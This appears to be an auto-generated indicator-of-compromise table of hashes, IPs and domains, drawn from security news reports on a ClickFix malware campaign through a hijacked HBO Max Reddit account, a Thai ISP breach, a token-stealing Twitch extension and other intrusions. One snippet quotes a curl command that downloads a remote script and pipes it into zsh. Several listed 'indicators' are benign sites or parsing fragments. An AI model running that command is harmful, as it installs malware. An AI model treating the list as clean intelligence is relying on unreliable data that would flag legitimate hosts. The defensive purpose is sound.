Indicators of compromise
3,569 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| sha256 | d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb | b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0c | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540 | 506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e5 | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c | f39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331 | , InstallFix /cl and recovered InstallFix artifacts SHA-256 ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1a | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb | 1301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb Fake Ledger, Trezor and Exodus application artifacts SHA-25 | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7 | ec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009 | Selectors for getData() , balanceOf() and setData() SHA-256 eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bf | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7 | 63b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287 | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| sha256 | f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e | b41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f1 | Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads Cyber Security News | · 16h ago |
| domain | opusaccel.top | and loop that polls a command-and-control (C2) server ("ocr.opusaccel[.]top") to receive further instructions that are then executed | China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE The Hacker News | · 17h ago |
| domain | code-desktop.com | promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| domain | codex-craft.com | inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| domain | hbomax-macos.com | ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| domain | hbomaxx.app | al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1 | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| domain | hbomaxx.us | cted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| ipv4 | 164.90.161.147 | lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September ma | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| ipv4 | 165.22.199.85 | rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration Septemb | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| ipv4 | 45.94.47.204 | omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemen | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| ipv4 | 77.91.65.13 | nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP autho | HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware GBHackers | · 17h ago |
| domain | ayuthayatech.com | fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A | Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor GBHackers | · 17h ago |
| domain | co.th | focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe | Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor GBHackers | · 17h ago |
| domain | hunt.io | 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp | Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor GBHackers | · 17h ago |
| domain | triplet.co | ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t | Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor GBHackers | · 17h ago |
| domain | abchina.com | .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit | Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group Recorded Future | · 23h ago |
| domain | ccb.com | k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio | Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group Recorded Future | · 23h ago |
| domain | com.cn | Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu | Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group Recorded Future | · 23h ago |
| domain | lzbank.com | Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc | Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group Recorded Future | · 23h ago |
| domain | clean-disk-guide.com | Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | code-desktop.com | sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | codex-craft.com | trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | hbomax-macos.com | Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | hbomaxx.app | s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | hbomaxx.us | n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 1d ago |
| domain | ttvnw.net | tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q | Twitch extension with 30K installs exposes users’ OAuth tokens BleepingComputer | · 1d ago |
| domain | clean-disk-guide.com | AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | code-desktop.com | , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | codex-craft.com | hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | ember-bridge.com | lowing command: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Hudson Rock noted ember-b | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | hbomax-macos.com | .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | hbomaxx.app | ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[ | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | hbomaxx.us | Max subreddits," warned the user . "The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button / | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 1d ago |
| domain | agent.3bb.co | eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 1d ago |
| domain | ayuthayatech.com | reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 1d ago |
| domain | co.th | s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords, | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 1d ago |
| domain | hunt.io | tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 1d ago |
| domain | ayuthayatech.com | s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 1d ago |
| domain | co.th | a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 1d ago |
| domain | hunt.io | configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly, | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 1d ago |
| domain | triplet.co | , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 1d ago |
| domain | f5.com | allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure | Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials Cyber Security News | · 1d ago |
| domain | server.host | se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress | Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials Cyber Security News | · 1d ago |
| domain | server.host | pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp | Hackers target exposed Vite dev servers to steal AWS, Azure secrets BleepingComputer | · 1d ago |
| domain | alexue4.dev | m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15 | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | api.jeetbot.cc | 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | drisnya.online | 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | enhanced-1.jeetbot.cc | tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | enhanced.jeetbot.cc | Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1 | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | ext-03.jeetbot.cc | IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | ext-styles.jeetbot.cc | P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.] | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | gmail.com | tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | img.drisnya.online | elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | jeetbot.cc | ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[. | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | morphilina.me | ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | proxy.morphilina.me | jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | proxy.thebeholder.deno.net | up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | thebeholderbotapi.vercel.app | ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| domain | thebeholder-proxy.deno.dev | ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| sha256 | 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc | ple.com Twitch Enhanced Viewer Firefox Add-ons ID; SHA-256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc Note: IP addresses and domains are intentionally defanged ( | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| sha256 | e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8 | ed Viewer | JeetBot Chrome Web Store extension ID; SHA-256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8 Firefox extension [email protected] Twitch E | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 1d ago |
| ipv4 | 89.34.96.56 | ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCP | Cyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning Cyber Security News | · 1d ago |
| domain | mail.uaiubifas.top | Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25 | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| domain | noht1ng.top | thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| ipv4 | 8.218.50.207 | n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong Domain | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| sha256 | 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 | RAYRABBIT command-and-control domain using port 443 SHA-256 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Trojanized DLL loader, originally identified as 7zp.dll wit | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| sha256 | 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e | ly identified as 7zp.dll with internal name boy.dll SHA-256 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94ed | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| sha256 | d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a | 98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a GRAYRABBIT backdoor with internal name core.dll File name 7 | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 1d ago |
| ipv4 | 8.8.8.8 | entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names, | Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities GBHackers | · 1d ago |
| domain | 115.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 116.181.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 128.200.178.68.host.secureserver.net | a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 129.202.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.] | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 13.189.202.64.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 135.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.] | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 162.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 181.202.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 48.178.169.192.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 76.180.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | 85.182.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | gexwalltool.com | [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| domain | x-wolverine.servebbs.com | ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a | 1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a Malicious PDF lure Email SHA-256 debe871710268e7bb770b72c67 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5 | 659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bd | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed | 4a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5e | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491 | 042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2eb | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd | 64f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044 | 89eb6b87bb0 2f0bd59d565 Phishing email artifact HTA SHA-256 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d119 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697 | 246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827be | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95 | ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
| sha256 | 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c | 3b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba2 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
